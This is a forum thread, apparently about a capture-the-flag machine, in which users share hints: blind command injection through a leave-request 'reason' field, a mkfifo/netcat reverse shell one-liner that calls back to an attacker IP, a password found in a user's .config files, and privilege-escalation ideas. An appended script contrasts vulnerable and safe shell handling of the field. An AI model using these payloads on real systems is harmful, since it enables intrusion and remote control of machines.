October 22, 2022 at 10:11 PM
(October 22, 2022, 10:07 PM)GreyEVO Wrote:
(October 22, 2022, 10:02 PM)sam123 Wrote:
(October 22, 2022, 09:55 PM)GreyEVO Wrote:
(October 22, 2022, 09:45 PM)pingu27 Wrote:
(October 22, 2022, 09:34 PM)GreyEVO Wrote:
connect as chris jones on the /hr/, then blind command injection in request leave to revshell, inject backticks then your command and gg
{"reason":"``whoami``","start":"23/10/2022","end":"01/01/2021"}
:(
only one, `[COMMAND]` why does the backtick work and why does it give us bash command access. I thought since this is a node.js server, it would js commands which is what I have been trying.
nc mkfifo on revshells works well to get a callback tho
cuz whatever you type in is processed server-side by /bin/sh in crontab to add to a csv file
gotcha, so you escape the exec function while I was trying to escape the function that cleans the code from bad chars. thanks

October 22, 2022 at 10:24 PM
nudge for user bean

October 22, 2022 at 11:01 PM
how did you get the revshell pls explain

October 22, 2022 at 11:03 PM
any nudges on the priv esc

October 22, 2022 at 11:05 PM
(October 22, 2022, 11:01 PM)Enemigosss2 Wrote: how did you get the revshell pls explain
on the hr page when you're logged with Christopher account go to leave requests section, in the Reason For leave enter `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc IP PORT >/tmp/`

October 22, 2022 at 11:14 PM
(October 22, 2022, 10:36 PM)Hacker2222 Wrote:
(October 22, 2022, 10:24 PM)pingu27 Wrote: nudge for user bean
backup file in bean home dir has password in a .config file
I can't find the password

October 22, 2022 at 11:17 PM
(October 22, 2022, 11:15 PM)Hacker2222 Wrote:
(October 22, 2022, 11:14 PM)u53r Wrote:
(October 22, 2022, 10:36 PM)Hacker2222 Wrote:
(October 22, 2022, 10:24 PM)pingu27 Wrote: nudge for user bean
backup file in bean home dir has password in a .config file
I can't find the password
it's in .config/xpad/content-XXXXXX
ty

October 22, 2022 at 11:17 PM
in .config/ you can do "grep -ir bean" to find it

October 22, 2022 at 11:22 PM
(October 22, 2022, 11:22 PM)Hacker2222 Wrote: u can login with admin user and bean password to store so that is prob privesc . source code shows os inject with many filters. any1 got a idea ?
doesn't the store run as www-data? i think you need to lateral into christine then privesc

October 22, 2022 at 11:28 PM
(October 22, 2022, 11:22 PM)Hacker2222 Wrote: u can login with admin user and bean password to store so that is prob privesc . source code shows os inject with many filters. any1 got a idea ?
Yeah, we can create a malicious product and use the add_item functionality to write to files with directory traversal on user parameter, but unfortunately store also runs as www-data. So I think that is a rabbit hole. But strangely it automatically deletes files in product-details, so idk.
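
Added example, not part of any post in this thread and not the machine's actual script: it shows the root cause named earlier in the thread (the field is handled by /bin/sh on its way into a CSV file) next to a fix that treats the field as data only. The function names, the sample reason and the `sh -c` pattern are assumptions for illustration.

```shell
#!/bin/sh
# Constructed sample: a "reason" field carrying a command substitution.
# The embedded command only echoes a marker string.
SAMPLE_REASON='sick `echo INJECTED`'

# Vulnerable pattern (assumed): the field is spliced into a command string
# that /bin/sh parses a second time, so backticks and $(...) inside the
# data are executed before the row is written.
append_vulnerable() {
    reason=$1; csv=$2
    sh -c "echo \"$reason\" >> \"$csv\""
}

# Hardened pattern: the field is only ever passed as an argument, never
# as part of a command string. CSV quoting doubles embedded quotes.
append_safe() {
    reason=$1; csv=$2
    escaped=$(printf '%s' "$reason" | sed 's/"/""/g')
    printf '"%s"\n' "$escaped" >> "$csv"
}

# Demo helper: run one appender against a temp file and print the row.
demo_row() {
    tmp=$(mktemp)
    "$1" "$SAMPLE_REASON" "$tmp"
    cat "$tmp"
    rm -f "$tmp"
}

echo "vulnerable: $(demo_row append_vulnerable)"
echo "safe:       $(demo_row append_safe)"
```

A character filter in the web application does not fix the first form: the sound fix is to stop building shell command strings from user-supplied fields at all.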